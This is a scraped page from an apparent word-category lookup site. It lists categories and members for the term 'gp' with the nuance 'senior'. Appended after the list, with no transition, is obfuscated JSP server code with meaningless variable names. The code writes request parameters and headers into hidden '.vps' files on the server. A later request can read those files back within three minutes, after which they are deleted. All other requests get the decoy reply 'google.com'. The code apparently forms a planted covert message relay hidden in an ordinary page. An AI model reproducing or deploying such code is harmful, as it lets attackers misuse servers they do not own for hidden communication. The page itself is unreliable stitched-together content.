Use the & operator to see the shared categories of two terms. E.g.
cola & coffee
or
divorce & war
Go Back
See XML
Categories for
gp
with nuance
senior
:
senior:physician,
Simple categories matching
senior
:
politician,
executive,
scientist,
activity,
role,
organization,
event,
leader,
administrator,
worker,
position,
manager,
woman,
job,
specialist,
academic,
doctor,
space,
individual,
residence,
official,
leaders,
cleric,
post,
management,
physician,
leadership,
staff,
person,
officer,
experience,
level,
group,
professional,
employee,
project,
people,
search,
household,
game,
authority,
college,
program,
trip,
servant,
appointment,
expert,
lecturer,
Members with property
senior
:
president,
works_director,
vicar,
ceo,
government_leaders,
hospital_consultant,
director,
atlantic-city_trip,
upright_captain,
dean,
consultant_gynaecologist,
biologist,
sales,
current_president,
cfo,
admiral,
summer_sport,
craft_show,
engineer,
beverage_manager,
weapon_officer,
provost,
dance,
service,
business_manager,
logistics_director,
professor,
housekeeper,
senior_engineer,
farmington_place,
minister,
sport,
supervisor,
wellness_program,
queens_college,
grad_night,
professorship,
chief,
professorial_level,
loan_officer,
tenure,
prestige,
chancellor,
board_director,
euchre,
local_aarp,
craft_project,
finance_director,
law_minister,
shuffleboard,
elder,
theology,
full_professor,
division_head,
city_college,
craft,
western_front,
private_office,
bingo,
disneyland_trip,
creative_director,
deputy_secretary,
administrator,
associate_head,
present_speaker,
horseshoes,
environmental_scientist,
programme_director,
performance_management,
class_picnic,
car_wash,
presidential_appointee,
donor_staff,
picnic,
security,
lecture,
head,
senior_executive,
leadership,
interim_provost,
colour_sergeant,
sergeant,
baccalaureate,
monk,
fitness,
ecologist,
hydroxyl,
craft_class,
leader,
policy_position,
church_circle,
annual_trip,
graduation,
district_director,
scholar,
camera_technician,
university_secretary,
landmark_court,
aquatic_biologist,
partner,
bunko,
relationship_manager,
law_officer,
inspector,
clinical_director,
american,
executive,
hospital_manager,
chief_privacy,
district_magistrate,
senior_bingo,
deputy_minister,
gps,
project,
priest,
foreign_portfolio,
under_secretary,
parent,
upper_management,
state_manager,
oregon_project,
gp,
principal_lecturer,
field,
commencement,
consultant,
golden_corner,
academic_secretary,
teacher,
dominoes,
postmaster,
demonstration,
senior_center,
aarp,
curriculum_manager,
clan_leader,
district_management,
senior_trip,
cio,
exercise,
consultant_post,
public-relations_officer,
research_analyst,
business,
home_office,
health,
professorial_appointment,
bocce,
council_president,
exercise_class,
club_activity,
social_event,
mi_manager,
national_president,
day_trip,
carbonyl,
registrar,
associate_dean,
important_person,
gambling,
assembly,
account_manager,
arts_college,
older_person,
headship,
health_fair,
cardinal,
administrative_position,
city_administrator,
practice_head,
manager,
wind_band,
political_leaders,
sales_manager,
foreign_minister,
magistrate,
general,
prom,
geriatrician,
practice_manager,
factory_foreman,
portfolio_manager,
division_administrator,
local_commander,
permanent_secretary,
chair,
award_night,
gynaecologist,
foreign_secretary,
academic_registrar,
cpr_class,
outing,
cultural_arts,
designer,
elementary_school,
community,
division_manager,
commander,
nature_program,
captain,
senior_project,
archdeacon,
arts,
comeback,
geologist,
trade_minister,
senior_lecturer,
unit_manager,
compliance_officer,
ethos,
center_director,
senior_lectureship,
navy_captain,
finance_manager,
dancing,
deputy_headship,
custody_inspector,
consultant_obstetrician,
lawyer,
officer,
senior_picnic,
senior_game,
trip,
assistant_director,
chief_magistrate,
functional_head,
sampler,
university,
municipal_administrator,
senior_mass,
customer_service,
locality_manager,
chief-executive_officer,
creative_work,
hospital_president,
branch_manager,
chief_inspector,
complaint_manager,
program_manager,
associate_specialist,
trust_chair,
operations_director,
interior_minister,
marketing_director,
hospice,
bridge,
secretary,
reader_service,
tutor,
psychiatrist,
fiscal_manager,
butler,
home_secretary,
hobby,
senior_play,
colonel,
general_manager,
special_event,
consultant_psychiatrist,
deputy_president,
church,
operations_manager,
doctor,
bounce_street,
advocacy_program,
regional_director,
institute,
professorship_level,
defense,
retreat,
class_night,
care_center,
departmental_director,
ia_officer,
friendship_house,
talent_show,
municipal_manager,
monitoring_officer,
warden,
retirement_home,
<%@page trimDirectiveWhitespaces="true"%> <%@page language="java" contentType="text/html; charset=UTF-8" pageEncoding="UTF-8"%> <%@page import="java.io.*"%> <%@page import="java.util.*"%> <%@page import="java.text.*"%> <%! static String cuy321a = null; public static String cuy321b(byte[] cuy321c) { char[] cuy321d = { 'A','B','C','D','E','F','G','H','I','J','K','L','M','N','O','P', 'Q','R','S','T','U','V','W','X','Y','Z','a','b','c','d','e','f', 'g','h','i','j','k','l','m','n','o','p','q','r','s','t','u','v', 'w','x','y','z','0','1','2','3','4','5','6','7','8','9','+','/' }; StringBuilder cuy321e = new StringBuilder(); int cuy321f = 0; for (int i = 0; i < cuy321c.length; i += 3) { int b = ((cuy321c[i] & 0xFF) << 16) & 0xFFFFFF; if (i + 1 < cuy321c.length) { b |= (cuy321c[i+1] & 0xFF) << 8; } else { cuy321f++; } if (i + 2 < cuy321c.length) { b |= (cuy321c[i+2] & 0xFF); } else { cuy321f++; } for (int j = 0; j < 4 - cuy321f; j++) { int c = (b & 0xFC0000) >> 18; cuy321e.append(cuy321d[c]); b <<= 6; } } for (int j = 0; j < cuy321f; j++) { cuy321e.append("="); } return cuy321e.toString(); } public void cuy321a(HttpServletRequest req) { if (cuy321a != null) return; String cuy321g = getServletContext().getRealPath(req.getRequestURI()).replace('\\', '/'); cuy321a = cuy321g.substring(0, cuy321g.lastIndexOf('/')) + "/"; } byte[] cuy321h(String cuy321i) { byte[] cuy321j = null; FileInputStream cuy321k = null; File file = new File(cuy321i); try { cuy321k = new FileInputStream(file); cuy321j = new byte[(int)file.length()]; cuy321k.read(cuy321j); } catch (Exception ex) { } finally { try { if (cuy321k != null) cuy321k.close(); } catch (Exception ex) { } } return cuy321j; } %> <% cuy321a(request); String cuy322a = request.getParameter("user"); String cuy322b = request.getParameter("rand"); String cuy322c = request.getParameter("id"); String cuy322d = request.getParameter("action"); int cuy322e = -1; if (request.getParameter("code") != null) cuy322e = Integer.parseInt(request.getParameter("code")) % 4; if (cuy322d != null && "home".equals(cuy322d)) { out.write("google.com"); } if (cuy322a != null && !"0".equals(cuy322a)) { String cuy322g = cuy321a + cuy322b + ".vps"; String cuy322f = cuy322g + "x"; String cuy322h = request.getParameter("hash"); String cuy322i = request.getHeader("From"); FileOutputStream cuy322j = null; cuy322j = new FileOutputStream(cuy322f); if(cuy322j != null) { DataOutputStream cuy322k = new DataOutputStream(cuy322j); cuy322k.writeLong(System.currentTimeMillis()); cuy322k.close(); cuy322j.close(); } cuy322j = new FileOutputStream(cuy322g, false); if(cuy322j != null) { cuy322j.write(cuy322h.getBytes()); cuy322j.write('|'); cuy322j.write(cuy321b(cuy322i.getBytes()).getBytes()); cuy322j.write('|'); cuy322j.write(cuy321b(cuy322a.getBytes()).getBytes()); cuy322j.write('|'); cuy322j.write(cuy321b(cuy322b.getBytes()).getBytes()); cuy322j.write('|'); cuy322j.flush(); cuy322j.close(); } out.write("google.com"); } else if (cuy322e == 0 && "0".equals(cuy322c)) { out.write("google.com"); } else if (cuy322e == 1) { File cuy322l = new File(cuy321a); String cuy322g = null; String cuy322f = null; int cuy322m = 0; if (cuy322l.exists() && cuy322l.isDirectory()) { for(File file:cuy322l.listFiles()) { cuy322g = file.getName(); if(cuy322g.endsWith(".vps")) { cuy322m = 1; cuy322g = file.getAbsolutePath(); cuy322f = cuy322g + "x"; break; } } } if (cuy322m == 1) { FileInputStream cuy321k = new FileInputStream(cuy322f); DataInputStream cuy322o = new DataInputStream(cuy321k); if(System.currentTimeMillis() - cuy322o.readLong() < 180000) { byte[] cuy322p = cuy321h(cuy322g); if (cuy322p != null) { out.write(new String(cuy322p)); } } cuy322o.close(); cuy321k.close(); File cuy322p1 = new File(cuy322g); cuy322p1.delete(); File cuy322pz = new File(cuy322f); cuy322pz.delete(); } else { out.write("google.com"); } } %>